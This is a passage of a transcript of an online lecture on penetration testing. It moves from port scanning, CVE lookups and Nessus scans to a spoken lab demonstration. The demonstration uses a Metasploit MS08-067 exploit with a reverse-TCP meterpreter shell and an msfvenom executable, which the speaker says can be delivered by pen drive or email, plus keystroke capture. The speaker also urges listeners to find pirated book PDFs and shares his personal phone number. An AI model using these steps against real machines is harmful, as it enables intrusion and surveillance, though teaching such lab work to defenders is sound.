IP, cannot be encrypted, or else communication will not be possible. Some layer of encryption is possible, but at least something will be there. So that's the way how passive scanning takes place. Okay, and attackers always do the passive scanning. They don't do the active scanning, and you cannot stop the passive scanning completely. So the someone should check it here now, that you, when you did that scanning here, you got these many ports open. The same thing when we did with the nmap, we got these many ports open. So some difference are there. So when you run this scanning, no, it is advised to do multiple time scanning, because you may not get the correct output all the time. So you have to do repeated attempts, and then you need to decide that, okay, you can get a confidence that, okay, what are the ports open in the target systems. Fine. So this was all about the information gathering about the target systems. Once you have done it, you know what is the target systems running all software. So what is next to do? The next thing to do, that I will just try to show you. Just hold on. I have to open the browser. I don't know if you are aware about it. This is called common vulnerability and exposure. My website is visible to you?
Yes, sir.
Yeah. So please see the approach very carefully. What we did, we started from the IP address, we reached up to the port number, we further scanned the system, and we got the details of the applications running on the target systems, which version of the application target computer is running, and then what next. So in internet, what happened, any applications or any software which has the vulnerability, it has been identified various people, and those vulnerabilities are openly disclosed in the network, in internet community, and people know about the vulnerability. So there are two types of vulnerability. One is known vulnerabilities and unknown vulnerabilities. Known vulnerabilities means the people already know about those vulnerabilities. Okay, and if the vulnerabilities is known, what you need to do, you need to patch the systems. So for example, if I say you are using Microsoft Team now, I always used to say that no software in the world is secure. Every software has vulnerabilities, and it is only the time when you will come to know, then you will patch it. So if I give a very simple example, which I always relate. So if you go to purchase a Maruti car, and you ask the showroom fellow, he will say this is the best car, it has all the features. He will never say that car is having any problems. You will say this is the best car on this price. So if you take a Maruti and you take a Mercedes, both car will take you from Mangalore to Bangalore or Mangalore to Mysore. Both car has 4-wheel steering, sitting capacity, everything is fine. But can you compare the features of Maruti and Mercedes? Obviously no. So everything comes with the cost. It is the cost which gives you the features. So if you are purchasing an operating system in 5,000 rupees, it has a specific features, and the same operating system which is used by NASA and ISRO, which cost with the 50,000 rupees, has different features. So you can't compare the features of two operating system, one which comes in the 5,000, one which comes in the 50,000 rupees. Suppose you are the developer, and if I ask you that give me all the top best security features of the software, it comes with the cost. It cannot be free. So if you are giving me operating system in 5,000 rupees, definitely there is something which is compromised, but not told to the user, thinking that he will never face such kind of threats, so no need to tell him about that. But tomorrow, if those compromise features, if those features are exposed in the internet, then what? Then you have to protect your customer, and then you need to release the patch telling that so and so operating system has so and so vulnerabilities, and we came to know about it and we are releasing the patch. So this is how the whole software community works. Every hardware, embedded software, if you see, you get a patch and update. What is those patch and update? The patch and updates are a weakness which the company or the developers came to know later on, and they have given the solution for that. And many of the problems they know well in advance, but they don't think to patch it because it will cost them more. So they wait and watch. All those vulnerabilities will be listed here. So in security philosophy, we say common vulnerability and exposure, and all the well-known vulnerabilities which is exposed in the internet community will be listed here. So you can see the CVE list home. Okay, you can go for the search CVE. So you can search any specific CVE related to, for example, MS SQL. I'll try to search. So you can see that you got CV 202065, multiple buffer overflow, SA account install the default password. So if you go in detail, you will get the detail of that. Okay. So every vulnerabilities which are known are visible here. So why we have come to this website? Why? Because when I found the version number of software, the first thing I will do that I will go and search on internet. For example, when I saw this, I saw this. So what I will do, Microsoft SMTP. So let me copy it if I can do, and then go to the Google. So what they do, you see that you started getting some hint. If you go in this, lead to code execution, SU shortest path, overflow, these are actually a kind of hint for you that if you deep dive into this, you will get to know that, okay, these are the vulnerabilities on that particular software and their version, and that is how the attack is planned. So again, let me relate back. So what I said, that first thing what we did, sorry. So what we did first, we have scanned the IP address, we got the port number, from the port number we got the applications and the version number of applications. With the version number of application, we further deep dive into the internet and try to find out that what are the loopholes on those applications and softwares. Further, you can go in more detail if you go with this mitre.org, where you have list of all the CV and what are the issues with those kind of vulnerabilities, and that's all. Okay. So this all is actually, we are in the first stage where we are talking about only uh, identifying the weakness in the system. We still not try to do the attack on the systems. Okay, that comes in the next stage. So first stage is only information gathering, the next stage is attacking. Okay. Okay, fine. Having said all this, how we'll go to the next step, we need to see now. uh, in the meantime, before going to the next step, we need to understand the difference between a known vulnerability and unknown vulnerabilities. All this attack which we are trying to do can be done only if the vulnerability is known. That means it is known in the public domain, but the user or whatever your target is, he has not patched his system properly. Somewhere his what you say, that configurations are weak, and that is why when you use any system or applications, whether it is your mobile phone or desktop, it is always advised that you patch it regularly. So if you don't patch, you left open for the attack. and 90% of the people, they are not bothered about upgrading or patching the system. So we will see that how costly affair it may be. So in the meantime, if you have any doubt, I would like to take the question from the users. We will be moving little fast. Any question from the audience?
Good morning, sir.
Yeah. Good morning, sir.
Good morning. Sir, I have one question.
Yeah, please.
Sir, when we do this scanning through Nmap,
Yeah.
Is it possible to have vulnerabilities on the very recent machines, updated machines, like we have Windows or Windows 8?
Yes, it is possible.
Or the Linux CentOS or CentOS 7?
Yes, sir, it is possible. Why? Because if you see even the Windows 10 which we are running now, so
Yes.
Windows 10 also, if you see, you will see that every week or month, Microsoft is giving you patch upgrades. Sir. So what is the meaning of giving patch? See, the one thing is very simple. There are two type of patch. One patch which to improve the performance of the system for various reasons, and another patch which is for the security problems. So if the patch is for the security upgrades, then definitely they have found something serious and they are releasing the patch. Otherwise, see, it's a very simple philosophy that nobody do something unnecessarily. So they found that it is serious and they released the patch. So if those patch is not upgraded in your system, then you can easily go and search on the Mitre. That's why I showed the Mitre.org, where you can go and search for the Windows 10 related issues. And you will find there will be various vulnerability listed out for Windows 10, Windows 7, or even for the Linux system, or even for the latest software. So you need to keep searching here and there and you will find out. And if they are not patched, then they are vulnerable.
Okay. And sir, at what time the vulnerability research is required, sir?
Vulnerability research is required because, see, I told you there are two types of vulnerability. One is known vulnerability, one is unknown vulnerability. Known vulnerability, so it is easy for everybody to do attack. But someone definitely would have explored it first time, right?
Yes,
it
sir.
has not fallen from heaven. Someone has attempted it first time. He might have put lot more effort to explore it from first time from his side, right? So what I mean to say that no system in the world is 100% secure. Definitely there is some vulnerability. It is left for individual that what type of technique he applied to explore it, and there only the research goes. Your creativity goes, and you somehow get the weakness of the system, and then you have explored it.
Okay, thank you.
Sir, I have one question.
Yeah, please go ahead.
Sir, is there a way to know whether our system is passively being scanned, like you have just shown? And how would
Passively
I know?
scanning your system, no. But if there is in gateways and router on, if they are logging it, then there is a possibilities to find out that someone was observing. But only your system, if you want to see that passively somebody is scanning, then the philosophy of the passive scanning itself will not be true.
Okay.
Okay, so fine.
Sir,
I'll be.
I
Yeah,
have one
please go ahead.
question.
Yeah, please go ahead.
Sir, this Nmap and Zenmap, these tools work only if the IP address of the target machine is known.
Yes, yes.
If it is, as you pointed out, sir, during your talk. So if these are the static IPs, then you can this one. If DHCP is configured and if those are dynamic, which are constantly changing every boot during the boot time, then how to?
That's what. So in that situation, you need to approach the target in different way. So somewhere you have to either deliver a kind of pen drive or kind of file to his system. So the moment he open it, he get connected back to you. So give me some time. I'm running out of time. I will show you that also. So sorry for interrupting. I'm not taking any question more now because I have to finish by 11:25:30. I have to run some urgencies there. But I don't want to miss the base important thing which I want to show you. I am extremely sorry, but I want to answer all the questions. Feel free to write your questions to the organizer and pass it to me. I will give my email address. Anytime you want, I will definitely clarify everything. Okay, moving to the next.
Sir, one last question, sir. Hello,
yeah, please.
Sir. One last question.
Please.
Sir, with the Nmapping and the the user can. Is it possible for the user to hack the system by using
It is
Nmap?
only for a scanning. It is only for scanning, no hacking.
Okay, I cannot hack any system, right?
You cannot hack. You cannot hack. You can only scan.
Right.
Okay.
Thank you.
I will show you the next tool. Okay. So.
Okay.
So I have gone through the Nmap and GenMap. The next tool which I am going to use is Nessus. You can make a note, Nessus and Nexpose. Nessus and Nexpose. Nessus and Nexpose are professional software for scanning the target system. So just let me log in. So it is a professional software and I have done the scanning of my target system. Sorry, it is creating problem. It always create problem like this. Just a minute to clear the data. Okay. So you see that I have scanned my target system. This is the IP address which I showed you for the window, and you can see the vulnerability listed here. This is the vulnerability percent: 18% critical, 41% high, 81% medium, 6% is low, and 93 is only the information. So if I go further, you see that these are the vulnerability which is highlighted for me, and Microsoft Windows XP unsupported installation detected, and there are critical vulnerabilities. If I click on this, I am getting the vulnerabilities here listed. Okay, what are the vulnerabilities? I will go back. This is mixed multiple issues. So you see this. I have listed out the multiple vulnerabilities of my target system, and I have got all this critical. And if I go in detail one by one, suppose I go for MS08067, this which is you can we will try to explore it. So I click on the MS08067, and you see that it has now you can remember that I told about the CVSS which the MITRE is mentioning. So MITRE common vulnerability exposure, no, they all mention these numbers only. So you can see that much detail is there. And what is important to see that exploitable with. So Metasploit MS0, somebody's mic is on, kindly mute yourself. So am I audible, right?
Yes, sir.
Yeah. So please focus on this. So what I did that
Sir, you are not audible.
Sir, you are not audible.
So Manish sir, can you please unmute yourself?
You are in mute, sir. Please unmute yourself.
am I audible now?
Yes.
Yeah, somebody muted me.
Yes, sir, you are audible.
Yeah, sorry. So where you lost me? Till what you could listen me? Can you tell someone?
Sir, you were explaining the CV and CVSS part.
Fine. So we started from Nessus. Nessus is a professional tools for scanning the target system, and I am using the community version of it. You can install it on Kali Linux free of cost. For learning purpose, you will get the community version. No license is required. And I have scanned the target system with Nessus software, and it has given me the complete detail of my target system vulnerability. In that, one vulnerability is this. There are various vulnerability. I am choosing one, MS08067. It is telling me vulnerability information, and it is also telling me it is a who can exploit it? So someone who is asking me that is it possible to attack with Nmap or Genmap? Not possible, but Nessus is giving you the name of the software which can attack on it. So if I have Metasploit and Canvas, I can attack on the target system. Okay. So it is like you have a binocular. With the binocular, you are watching to your enemy, and on the screen of binocular, you are getting the information that you use a small pistol or you use a big rocket launcher to attack this fellow. This is the range, and with this weapon you can attack him. So things become very simple, right? You need not search and you not put more and need not scratch your head to find out how to attack on it. So you can understand that how sophisticated tools are available, which gives all options to you to do all these things, and that too free. Okay, so we could find out one vulnerability, MS08067, which can be used to attack on the target. So these tools can be used like Nessus. You have another tool that is Nexpose, and you have another tool called OpenVAS. All these tools are professional target scanner. Okay, so with this, I will stop the scanning work, and now I have to quickly move on attacking software. So because that is the most important which people would like to see. Time permit, I'll try to finish that. So let me just do this, okay? Yeah. So these softwares are very heavy, resource intensive software, so need to stop it. Okay. So I did that. Now I need to run the another software called Metasploit. So Metasploit also comes free in the Kali Linux, and you can launch the Metasploit using MSF console. And why we are running it? Because Nessus showed us that you can attack on the target using the Metasploit. So I'm launching the Metasploit, and to launch the Metasploit, you need a command MSF console. So I will try to attack on. I will try to show you the process whatever is used to attack, and let us see that one by one, and let us see how much it goes. So Metasploit is ready. We need to start using it. So how do we use it? So which vulnerability we are going to exploit on the target? The vulnerability is MS08067. So first thing we need to see that does this software has this capability to attack on the target? So how do we search it? So search MS08067 net API. That is the vulnerability. So you can see that yes, it is found. That means Metasploit has that option to do it. So what we will do that? So we'll use Windows / you need to use this full. You need to use this. I'm using this. Okay, SMB /MS08067 net API. Okay. So it should be loaded. So now it is loaded. Okay. And then Metasploit has a ready-made. It is like, no, you have the weapon, but you need to put the bullet in the weapon. So it has ready-made bullet. You need not do anything. This bullet will go to the target system and get executed there. So how to load that? So there are various. So I want a reverse TCP. Reverse TCP is a kind of payload which will go to target system, and when it execute, it will give you the command to connect back to you. So I will use that. So set payload. These are the commands. Windows. It is already set. Payload is already set, but I still am doing that. Interpreter reverse TCP. Set payload Windows meter. Spelling is wrong. PRETER. Spelling is wrong. Meter. METER. EPTER. What I'm doing. Set payload. The value specified is not valid. Just hold on. So it is set now. Payload is set. Then what I will do that I have a remote host where I want to attack. So what is my remote host? I will just check that 1 minute. So my remote host is 192.168.133.131. This 30 is mine, and I want to attack on 31. That is my Windows XP system. So I need to set. So what is the command? You need to set rhost, ROHST. Rhost stands for remote host. What is the IP address? 192.168.133.131. That's right. 168, 132, 131. Done. Then I need to set my IP address so that the computer after attack should connect back to me. So set lhost. Lhost is local host. So what is my address? 192.168.133.130. That is my address. So when they will connect me, only IP address is not required. My port number also is required. So I will give one port number. Set L port. L port is local port. Let it give 8080. Okay. Done. Okay. And then let me just try. So you could see that it is you got the meterpreter command. The moment you got the meterpreter command, that means the system is compromised. So if I go to the XP, nothing is visible on the XP. XP system looks simple, right? But now what I will do that I will try to run command here. So see that cell is a command prompt. So you got a window command prompt and shutdown minus s, I think, right?
Space minus s.
Okay, sorry, space. Let us see this. What happened? It is shutting down. So my target system got compromised and it is shutting down now. So it will shut down in, I can't stop it in 15 seconds or it's going on. So you could see that how easily we could attack on the target system, but I wanted to show you the complete steps which we use to attack. So first we use IP address, then we scanned on the target system, then we found the vulnerabilities on the target system, and then the software itself gave the option that you use these tools to attack, and then we use the Metasploit, then we just use those loaders to attack the system, and it's compromised. The step is same for attacking any type, whether it is mobile phone or it is the same thing I can do even to attack on your what you say, your mobile phone, and it won't take much time. Okay. So I will just quickly come out. It's not stopping. My system is dead that side, right? So nothing is happening. Okay. Okay, fine. So I have another 5 to 10 minutes, then I'll take some quick questions. And before that, what I wanted to do. Yeah, someone asked that what happen if I don't have the I don't know the IP address, then what shall we do? So I will show you the command and I'll try to show if the time permit how to do that. I'm really sorry because I got some urgency at 11:30. So those who wanted to do that, I will tell you the approach to do that. That is called there is a separate command. Before I go to that and before I miss something, I will tell you that you can do all this experiment if those who are not comfortable with MSF console, you have another command called Hermitage. Hermitage is a GUI form of Metasploit. Okay, so if you can't remember that much command, then you can use the Hermitage. So this is how Hermitage look like. So to run that, I have to start Metasploit and PostgreSQL. I'm trying to show you another tools. Just hold on. Someone asked me what happened if I don't know the IP address, and that is also interesting attack actually. So for that we have a tool called MSF Venom. Okay, yeah. So this is the Hermitage. Okay, it is asking me. Okay, could not connect to password. Okay, I need to start multiple service. It will take time, but okay, you can follow it. Just start the Hermitage command and it will work. It is asking me to start all the process. If I start one by one, it will take time and we will lose important things. So quickly, I will show you another concept called MSF Venom. Okay. So what is that? MSF Venom. It is a tool which is available on Kali Linux. It is a independent packet generator. So you can generate a packet and send it to through pen drive or through mail through to the remote system. And if you open, it will automatically get connected. So I have created MSF Venom, and you will get the command. I will tell you how to get it. Windows/meter PRETER reverse TCP lhost. So I am putting only my IP address so that it should connect me. So my IP address is suppose 198.168.133.130, and then on which port it should connect it. So L port equal to 1, 2, 3, 4, 5, something like that. It should be equal to here. And then what type of file you want to generate? So I want to generate exe file, and I will give the name test.exe. So you see that the file is generated. This file you have to put on the destination system and it should run. But that file will run there. But someone should be here to listen, right? So how to do that? So for that you have to run a handler. That is, in server and client server we have the concept of listening port. So I have made the packet, but in my system someone should be there to listen it. So how to do that? So for that you have a module called multi-handler. So use multi-handler set payload Windows METER PRETER reverse TCP. It is done. Oh, sorry, I'm in wrong. I have to go to MSF console. There only I can set it. Yeah. So sorry, I have to use multi-handler. So now it is done using configure multi-handler. What I have to do, set payload Windows METER PRETER. Set payload Windows METER METER done. And then what I will do that, set lhost. I have to set my IP address. So first let me check. Set lhost. What is the IP address? Mine 192.168.133.130, and port number, set L port 12345. So now it is running and I will be in the listening mode. And let us go back to our client system. I have already somehow got suppose I have already got that independent payload which we generated with the MS of VNOM. Suppose I have already got it here. So if I have got it, my document I have created for you, Mahe. So I'm just running it. And you try to see that what happened. See, the moment I executed it, the meterpreter command is running here. So I got again, means my system is compromised now. You see in this desktop, nothing is visible, but it got connected to the remote system. So what else? I can do anything. Go to the cell, go to dir, get everything. I can run hell lot of command to capture every keyword, every keystroke, and anything whatever I want to do. So I just showed you both the approach. One where I know the IP address, one when I don't know the IP address. So all of you, running out of time. I thought to do much. We'll see sometime else, but no, not an issue. Kindly note down the resources, which is very important. In a quickly 5 minutes, I would like to show you various things. One thing is very important for all of you, that the book name is Penetration Testing. I'll write here. Yeah, I'll write here. Penetration Testing, a hands-on introduction to Hacking by Georgia Widman. The second book is Metasploit, the Penetration Tester's Guide by David Kennedy. Both the book I don't want to give to you. It will be illegal. Search on the Google, get free. You will get mostly free PDF. Okay. Everything, whatever I am teaching is free on the internet. Resources are free. Now, the most important thing, the next which I would like to give you is please use this Seed Lab. I don't know how many you have browsed it, but I appreciate, hats off to the person who developed it. Please go to this Seed Labs and lectures. You have all the labs, security basics, cell sock, buffer overflow, return to, and the gentleman has put all what you say that what do you say you will get. I'll show you. You will get pure virtual machine. You will get every instruction, how to execute it, how to and every lab. If you go to that, just I wanted to show that documentation, lab setup. Network security lab, and you have all these labs, okay, and you will get for example IP ICMP attack lab. So he has given the complete descriptions and how to execute it, how to do it. So very good resource for the faculty members to take it into the lab. We know the pain of configuring a lab for these kind of securities. It's not so easy for someone to set up this and do all this lab. But the only thing is these labs require a thorough understanding. You need to give the complete details to the student, and the faculty has to go through little insight. But definitely if you want to learn the fundamental weakness in the computer, and let me tell you, most happen because of weakness in your system, and that you are helpless to patch those weaknesses. You cannot. This is not weakness, actually exploitation of the functionality. I won't say that it is weakness. It is not the weakness that header is kept open. It is like features. So port address and IP address cannot be encrypted. Not all the port number IP address can be encrypted, but that is exploited. So it is not weakness, but these things are exploited. So that is how the system is. So if you go with these labs, I am definitely sure that you will get in-depth knowledge. And second thing, the most important is if someone asks me, sir, how it was possible to just do some command and the target computer got exploited without knowing the target computer, what actually magic is happening? So sir, there is no magic. There is some kind of vulnerability in your programming. So you have developed the operating system, your port is running and that port is receiving some packet, and you are expecting that packet will be ideal packet, but that packet has some kind of information which your system could not notice that it is vulnerable, and that could got executed on the target system, and then it is exploited. So the weakness is most on the coding part. So if you take little next step, that okay, we are doing all this stuff, we are learning how to attack and all, what is the steps to stop this all? So to stop this all, the only things can help you is secure coding. So I will again give you another link, that please try to learn secure coding using C++, and please follow the link, the Carnegie Mellon University, which has a huge resource available, secure coding using C++. There are books available. There is online MOOC based teaching platform is available, and you can go through, you can learn it, you can do the exercise, and your students can do it. So there are plenty of things available. So in the limited time, 2 hours, I really I'm extremely sorry I could not give you the break because I wanted to take more sessions, but some unavoidable circumstances I could not do. Sometime we'll see, but yeah, I try to give you something whatever possible in the limited time. And my email address I will give you, so any contact if they want to have any address, please. I'm not available on WhatsApp, I don't use. So you can use this. Feel free to ask anything. And now I would have taken more questions, but because of the shortage of time, I could not do. But right now I have 5 minutes. Feel free, anything you want to ask me, I will try to answer. You can ask anything.
Sir, namaskar ji, namaskar.
Namaskar.
I enjoyed your lecture very much.
Thank
And
you,
it's
sir.
fascinating. In YouTube, I found that one or two lecture you have only in Telugu, it seems to be in Telugu. So I request you to put your lecture on the YouTube so that more people can get
Definitely I
it.
will do. Yeah.
And especially this lecture.
Thank you, sir. I will do that, sir.
Yeah, thank you. Thank you very much. I enjoyed it. I enjoyed it. My name is M. Havladar. I'll write to you.
Okay,
From
sir.
Bombay.
Yes, sir.
Good morning. Sir, it was a wonderful lecture. I am also teaching this information security. Sir, is the PhD option still open in this penetration testing?
Sir, these fields are kept open for whole life. And let me tell you all of you, wherever I give lecture, I say everybody, data mining was there, it may not be there after some time. Cloud computing is there, now fog has come. Blockchain is there, it will go with the multi-chain or what you say that multi-hash. There are various other technology coming. They are substituting each other, but cyber security was there, it is there, it will be there. You cannot imagine anything without cyber security. The second thing, why it will be there, because it is a game between the two parts, one attacker and one the defender, and the winner will be the person who will put more knowledge and effort. So there is no end of it. Whatever you develop tomorrow, it will be exploited. So since there is no certain output, there is no certain result, so the continuous research has to go, and you can't stop it. Anything you develop in the cyber security, it will definitely will be broken tomorrow. So next up, somebody has to come and do the improvisation on that, and that's why this field is never going to stop.
Okay, sir. Thank you. Thanks for the inspiration, sir.
Sir, can you repeat your email ID, sir, please?
Sir, my email ID is manishkumarjsr@yahoo.com.
Okay, sir.
I have written, my screen is shared, right?
Yes, sir. Thank you.
Yeah. manishkumarjsr@yahoo.com. My mobile number is 99169253441. I am not using WhatsApp, so I will be using only plain text message. I am available on Facebook. You can connect me there.
Yes, sir. One final question I'm having.
Yeah,
is
please,
it possible to make the system completely secure? Like you talked about the open ports and filter ports. So if the service is running and if it is hidden firewall, like whether it is possible for the attacker to attack it. So can system be made almost?
If you ask me as a security expert, I will say we can do a lot more to secure it. But I teach from the both sides. So as an attacker, I will also tell you that there is a possibility to attack from other side. So a system can be 100% secure only if it is a totally airtight system. That means not connected through networks. But still, there is a possibility to connect pen drive and other things. Then you are again compromised. And you can see the use case how Iranian nuclear plant was compromised. There is a very good case study, that Stuxnet attack. You will understand.
Even if you are connected to the remote system, but if you secure the system behind the firewalls and all the rules accordingly you set up and all, whether it still becomes vulnerable.
Yes, it is possible. It is possible.
Okay, thank you, sir.
And sorry, I could not give you the actual scenario that how it is possible, because it will take another 15 minutes for me. I am running out of time. But I can explain
Hello,
that
sir.
how it is
Hello.
possible. Yeah.
Okay.
Yes, please go ahead.
Sir, sir, apart from Kali Linux, is there any other operating system where we can do
Sir,
all this hacking?
I have heard one operating system. Sorry, it is missing out of my mind.
Parrot proxy.
Sorry?
Parrot proxy, sir.
Okay, sir, there are plenty of operating system available, but among all these, Kali is very much popular. But there are many OS and tools are available.
So Kali is the ultimate.
But I heard that most of the hackers, ethical hackers, are working on Kali Linux.
Yes,
and
because easily available, and the most important thing is you have the documentation available. That's why.
Okay. And sir, what is the scope of this particular cyber security in future, according to you?
So that's what I told. It is never ending, and it is a very vast domain. So cybersecurity, anybody want to take forward, I will say first pinpoint that which domain. Cybersecurity for mobile or for database or for cloud or for network or for web, which one you want to master. There are endless opportunity. Okay, sir. Now it's 11:30. I have to run very quick. I am closing now. Thank you all for patience listening. I hope I have not bored you. I tried my best to deliver. Thanks a lot. Thank you, the
Yes, thank you.
organizers.
Thank you,
the
Dr.
organizers
Manish, for insightful session. So we just look forward for offline session with you soon, probably when you have time.
Sure. Thank you. Thank you very much. Thanks, Balchandra sir, for inviting me. Thanks all Mahi team for conducting wonderful session. Thank you all. Thank you.
Thank you, sir.
Thank you, sir.